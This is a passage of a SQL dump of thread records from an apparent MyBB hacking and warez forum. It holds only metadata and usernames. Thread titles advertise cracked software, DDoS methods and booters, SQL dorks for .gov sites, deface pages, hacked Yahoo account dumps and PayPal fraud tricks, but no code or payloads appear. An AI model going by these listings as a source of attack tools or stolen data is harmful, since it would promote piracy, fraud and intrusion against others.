'1352603954', 't3h jok3r', '1', '26', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1171', '33', 'Anyone have photoshop cracked?', '0', '0', '0', '4', 'Triple H', '1351750472', '6840', '1352598257', 'iTzIpod', '82', '38', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1172', '83', '[tut]How to knock someone out[/video]', '0', '0', '0', '4', 'Triple H', '1351751050', '6843', '1351897157', 'VirtualLegend', '228', '19', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1173', '5', 'Request for LH staff', '0', '0', '0', '1', 't3h jok3r', '1351757796', '6846', '1352195911', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1174', '47', '?? Untraceable PayPal + Never Get Limited Again + PP Secret ??', '0', '0', '0', '228', 'VirtualLegend', '1351791040', '6866', '1351799504', 'XxTREYZxX', '257', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1175', '4', 'Me:3', '0', '0', '0', '265', 'Ryan', '1351792445', '6869', '1351891893', 'VirtualLegend', '228', '24', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1176', '47', 'Free .asia domain', '0', '0', '0', '84', 'Thunder™', '1351792454', '6870', '1352770341', 'TheBlueCat97', '346', '23', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1178', '35', 'My new Siggy', '0', '0', '0', '257', 'XxTREYZxX', '1351853769', '6915', '1351892282', 'XxTREYZxX', '257', '13', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1179', '4', 'LSD is here', '0', '0', '0', '313', 'LSD', '1351876624', '6920', '1352000493', 'RAND0M1ZER', '262', '17', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1180', '16', 'What is Social Engineering?', '0', '0', '0', '82', 'iTzIpod', '1351894475', '6938', '1351949563', 'iTzIpod', '82', '13', '2', '', '1', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1188', '35', '[Crack] Adobe CS6 Programs', '0', '0', '0', '9', 'p420', '1352007007', '6999', '1352257694', 'Timmy', '5', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1181', '7', 'Who wants Jok3rs private DDoSing method', '0', '0', '0', '5', 'Timmy', '1351916878', '6946', '1352195245', 'Timmy', '5', '46', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1182', '3', 'Can we report dead links?', '0', '0', '0', '5', 'Timmy', '1351917356', '6951', '1351960948', 'NXK', '61', '13', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1183', '46', '[TUT] Getting Images from index', '0', '0', '0', '4', 'Triple H', '1351918452', '6956', '1352186345', 'p420', '9', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1184', '67', 'Making an IRC based shell booter', '0', '0', '0', '4', 'Triple H', '1351918794', '6957', '1351918794', 'Triple H', '4', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1185', '13', 'SQL Dorks for .gov', '0', '0', '0', '4', 'Triple H', '1351918923', '6959', '1351918923', 'Triple H', '4', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1186', '68', '[HTML]Designing a Deface page', '0', '0', '0', '4', 'Triple H', '1351919107', '6960', '1351919107', 'Triple H', '4', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1187', '7', 'L33T Hacking keywords', '0', '0', '0', '8', 'spacefish36', '1351922442', '6961', '1352046612', 'NXK', '61', '20', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1189', '15', '?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '0', '0', '9', 'p420', '1352007238', '7000', '1352046845', 'Apathy', '2', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1190', '3', 'New Rule', '0', '0', '0', '1', 't3h jok3r', '1352010460', '7004', '1352293091', 'NXK', '61', '82', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1191', '54', '[4 nov]HUGE MIXXX OF WORKING PASSES FOR 4.NOV.2012', '0', '0', '0', '255', 'sbhshroy2', '1352024025', '7014', '1352024025', 'sbhshroy2', '255', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1192', '3', 'Name error', '0', '0', '0', '53', 'sirchamp', '1352142728', '7037', '1352180291', 't3h jok3r', '1', '29', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1204', '3', 'We are L33T', '0', '0', '0', '1', 't3h jok3r', '1352195855', '7084', '1352372370', 'VirtualLegend', '228', '53', '12', '', '0', '0', '0', '', '1', '0', '1', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1194', '4', 'moruzaks in the building', '0', '0', '0', '323', 'moruzaks', '1352161212', '7042', '1352206697', 'iTzIpod', '82', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1195', '47', 'Premium Minecraft Accounts', '0', '0', '0', '324', 'Purps™', '1352172410', '7045', '1352315328', 'VirtualLegend', '228', '65', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1196', '7', 'Your favorite time of the year?', '0', '0', '0', '205', 'mothered', '1352176330', '7048', '1352263500', 'mothered', '205', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1197', '4', 'Perfection', '0', '0', '0', '325', 'Perfection', '1352177312', '7050', '1352248960', 'XxTREYZxX', '257', '25', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1198', '64', 'Skyfall (2012) Movie RIP', '0', '0', '0', '9', 'p420', '1352183780', '7061', '1352183780', 'p420', '9', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1199', '64', 'Silent Hill: Revelation 3D (2012) Movie RIP', '0', '0', '0', '9', 'p420', '1352185232', '7062', '1352185232', 'p420', '9', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1200', '65', '[Review] Skyfall 2012', '0', '0', '0', '9', 'p420', '1352185360', '7063', '1352185360', 'p420', '9', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1201', '64', 'Sinister Movie Rip', '0', '0', '0', '9', 'p420', '1352186162', '7064', '1352519425', 'Triple H', '4', '3', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1202', '34', '???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '0', '0', '62', 'R?????zo?', '1352193031', '7071', '1352762765', 'iTzIpod', '82', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1203', '21', 'Jok3r Manual DoSing sites method', '0', '0', '0', '5', 'Timmy', '1352195123', '7073', '1352371915', 'VirtualLegend', '228', '33', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1205', '43', 'Barcodes Truth', '0', '0', '0', '8', 'spacefish36', '1352196194', '7087', '1352196194', 'spacefish36', '8', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1206', '35', 'Sexy Girls Cool Wallpapers 1920 X 1200', '0', '0', '0', '62', 'R?????zo?', '1352199201', '7088', '1352254157', 'R?????zo?', '62', '14', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1207', '35', 'Rate these logos', '0', '0', '0', '82', 'iTzIpod', '1352242352', '7133', '1352770510', 'iTzIpod', '82', '24', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1208', '9', 'Steady $8 a Day [EXPLOIT]', '0', '0', '0', '5', 'Timmy', '1352257163', '7166', '1352557552', 'XxTREYZxX', '257', '26', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1209', '15', 'WinRAR cracked', '0', '0', '0', '5', 'Timmy', '1352257356', '7167', '1352534038', 't3h jok3r', '1', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1210', '21', '[Cracked] Dark DDoSer', '0', '0', '0', '5', 'Timmy', '1352257552', '7168', '1352257552', 'Timmy', '5', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1211', '18', 'Facebook Blaster Pro v10.0', '0', '0', '0', '5', 'Timmy', '1352257874', '7170', '1352771602', 'CommandoModz', '306', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1212', '30', 'Floristbooter v4.0.1 ~ Proof ~ Sleek Design ~ Custom Coded', '0', '0', '0', '5', 'Timmy', '1352258194', '7171', '1352314462', 'sirchamp', '53', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1213', '34', 'Black Sleek Thread Design .PSD', '0', '0', '0', '9', 'p420', '1352258497', '7173', '1352594009', 'XxTREYZxX', '257', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1214', '43', 'Tons of PIDs', '0', '0', '0', '9', 'p420', '1352258706', '7174', '1352322172', 'VirtualLegend', '228', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1215', '3', 'Post/PM Allowed for ACCOUNTS Only.', '0', '0', '0', '61', 'NXK', '1352258731', '7175', '1352393452', 't3h jok3r', '1', '37', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1216', '52', '[Release]Skype Resolver & GeoIP', '0', '0', '0', '9', 'p420', '1352259453', '7177', '1352290301', 'iTzIpod', '82', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1217', '29', 'Win all paypal disputes!', '0', '0', '0', '1', 't3h jok3r', '1352259809', '7178', '1352321629', 'VirtualLegend', '228', '17', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1218', '17', 'Camdecoy bitch available here', '0', '0', '0', '8', 'spacefish36', '1352260040', '7179', '1352476992', 'moruzaks', '323', '10', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1219', '44', 'FIFA 13 Receipt', '0', '0', '0', '1', 't3h jok3r', '1352260181', '7180', '1352765645', 'Apathy', '2', '14', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1220', '12', 'Big list Hacking tutorials with .txt', '0', '0', '0', '62', 'R?????zo?', '1352276913', '7193', '1352526732', 'PiXEL^OG', '258', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1221', '7', 'So Obama wins...', '0', '0', '0', '205', 'mothered', '1352289481', '7197', '1352328882', 't3h jok3r', '1', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1222', '13', '400,000 Hacked Yahoo Accounts Dumps', '0', '0', '0', '9', 'p420', '1352349546', '7232', '1352571980', 'Triple H', '4', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1223', '69', '[Release] IP Manager', '0', '0', '0', '9', 'p420', '1352349889', '7233', '1352349889', 'p420', '9', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1224', '68', 'Twitter Bootstrap Tutorial', '0', '0', '0', '9', 'p420', '1352350103', '7234', '1352350103', 'p420', '9', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1225', '25', '[Serials] Malwarebytes Full keys Dump', '0', '0', '0', '5', 'Timmy', '1352393640', '7249', '1352527686', 'spacefish36', '8', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1226', '30', 'Release Cracked - Youtube Booster Pro edition!', '0', '0', '0', '5', 'Timmy', '1352393844', '7250', '1352474295', 'sirchamp', '53', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1227', '4', 'Whaddup! <3', '0', '0', '0', '333', 'illest', '1352413588', '7254', '1352450845', 'XxTREYZxX', '257', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO `mybb_threads` (`tid`, `fid`, `subject`, `prefix`, `icon`, `poll`, `uid`, `username`, `dateline`, `firstpost`, `lastpost`, `lastposter`, `lastposteruid`, `views`, `replies`, `closed`, `sticky`, `numratings`, `totalratings`, `notes`, `visible`, `unapprovedposts`, `attachmentcount`, `deletetime`) VALUES ('1228', '35', 'New banner!', '0', '0', '0', '333', 'illest', '1352414056', '7256', 